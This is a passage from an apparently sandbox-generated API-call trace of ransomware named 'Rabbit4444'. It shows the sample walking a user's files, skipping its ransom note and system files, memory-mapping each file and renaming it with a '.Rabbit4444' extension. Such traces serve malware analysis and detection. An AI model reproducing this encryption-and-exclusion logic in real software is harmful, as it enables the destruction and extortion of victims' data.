lpString2=".") returned 0 [0067.540] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x249cf976, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24d16d3f, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0xf193803b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.540] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.540] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.540] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.540] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.540] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.540] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf193803b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf193803b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf193803b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.540] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.540] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.540] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24c5825f, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24c5825f, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24ca4711, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x541a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.0.filtertrie.intermediate.txt", cAlternateFileName="00FILT~1.TXT")) returned 1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.540] lstrcmpiW (lpString1="0.0.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.540] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.0.filtertrie.intermediate.txt" | out: lpString1="0.0.filtertrie.intermediate.txt") returned="0.0.filtertrie.intermediate.txt" [0067.540] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.542] lstrlenW (lpString="0.0.filtertrie.intermediate.txt") returned 31 [0067.542] lstrlenW (lpString="Rabbit4444") returned 10 [0067.542] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.542] lstrlenW (lpString=".dll") returned 4 [0067.542] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.542] lstrlenW (lpString=".lnk") returned 4 [0067.542] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.542] lstrlenW (lpString=".ini") returned 4 [0067.542] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.542] lstrlenW (lpString=".sys") returned 4 [0067.542] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.542] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.543] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15885335870) returned 1 [0067.543] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21530) returned 1 [0067.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0067.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.543] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5720, lpName=0x0) returned 0x29c [0067.544] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5720) returned 0x70000 [0067.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0067.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.546] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15885706366) returned 1 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0067.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.546] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.547] CloseHandle (hObject=0x29c) returned 1 [0067.547] CloseHandle (hObject=0x280) returned 1 [0067.547] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.547] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.0.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.548] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ca4711, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24ca4711, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24ca4711, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.1.filtertrie.intermediate.txt", cAlternateFileName="01FILT~1.TXT")) returned 1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.548] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.548] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.1.filtertrie.intermediate.txt" | out: lpString1="0.1.filtertrie.intermediate.txt") returned="0.1.filtertrie.intermediate.txt" [0067.548] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.549] lstrlenW (lpString="0.1.filtertrie.intermediate.txt") returned 31 [0067.549] lstrlenW (lpString="Rabbit4444") returned 10 [0067.549] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.549] lstrlenW (lpString=".dll") returned 4 [0067.549] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.549] lstrlenW (lpString=".lnk") returned 4 [0067.549] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.549] lstrlenW (lpString=".ini") returned 4 [0067.549] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.549] lstrlenW (lpString=".sys") returned 4 [0067.549] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.550] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.550] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15886058833) returned 1 [0067.550] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0067.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0067.550] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.554] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0067.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.556] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.556] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15886687553) returned 1 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0067.556] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0067.556] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.556] CloseHandle (hObject=0x29c) returned 1 [0067.556] CloseHandle (hObject=0x280) returned 1 [0067.556] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.557] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.1.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.558] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ca4711, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24ca4711, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24ca4711, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.2.filtertrie.intermediate.txt", cAlternateFileName="02FILT~1.TXT")) returned 1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.558] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.558] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.2.filtertrie.intermediate.txt" | out: lpString1="0.2.filtertrie.intermediate.txt") returned="0.2.filtertrie.intermediate.txt" [0067.558] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.559] lstrlenW (lpString="0.2.filtertrie.intermediate.txt") returned 31 [0067.559] lstrlenW (lpString="Rabbit4444") returned 10 [0067.559] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.559] lstrlenW (lpString=".dll") returned 4 [0067.559] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.559] lstrlenW (lpString=".lnk") returned 4 [0067.559] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.559] lstrlenW (lpString=".ini") returned 4 [0067.559] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.559] lstrlenW (lpString=".sys") returned 4 [0067.559] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.559] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.559] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15887005353) returned 1 [0067.559] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.559] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0067.559] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.561] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e1e8 [0067.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0067.562] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15887279135) returned 1 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0067.562] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.562] CloseHandle (hObject=0x29c) returned 1 [0067.562] CloseHandle (hObject=0x280) returned 1 [0067.562] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.562] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\0.2.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.563] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24d16d3f, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x24d16d3f, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x24d3d07b, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x710f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.ft", cAlternateFileName="")) returned 1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="Rabbit4444.exe") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2=".") returned 1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="..") returned 1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="windows") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="bootmgr") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="pagefile.sys") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="boot") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="ids.txt") returned -1 [0067.563] lstrcmpiW (lpString1="Apps.ft", lpString2="NTUSER.DAT") returned -1 [0067.563] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.ft" | out: lpString1="Apps.ft") returned="Apps.ft" [0067.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.ft", dwFileAttributes=0x0) returned 1 [0067.564] lstrlenW (lpString="Apps.ft") returned 7 [0067.564] lstrlenW (lpString="Rabbit4444") returned 10 [0067.564] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0067.564] lstrlenW (lpString=".dll") returned 4 [0067.564] lstrcmpiW (lpString1="s.ft", lpString2=".dll") returned 1 [0067.564] lstrlenW (lpString=".lnk") returned 4 [0067.564] lstrcmpiW (lpString1="s.ft", lpString2=".lnk") returned 1 [0067.564] lstrlenW (lpString=".ini") returned 4 [0067.564] lstrcmpiW (lpString1="s.ft", lpString2=".ini") returned 1 [0067.565] lstrlenW (lpString=".sys") returned 4 [0067.565] lstrcmpiW (lpString1="s.ft", lpString2=".sys") returned 1 [0067.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{eeadb6e1-358f-425e-ad62-9fd7c271f1c8}\\apps.ft"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.565] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.565] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15887570727) returned 1 [0067.565] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=28943) returned 1 [0067.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.565] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 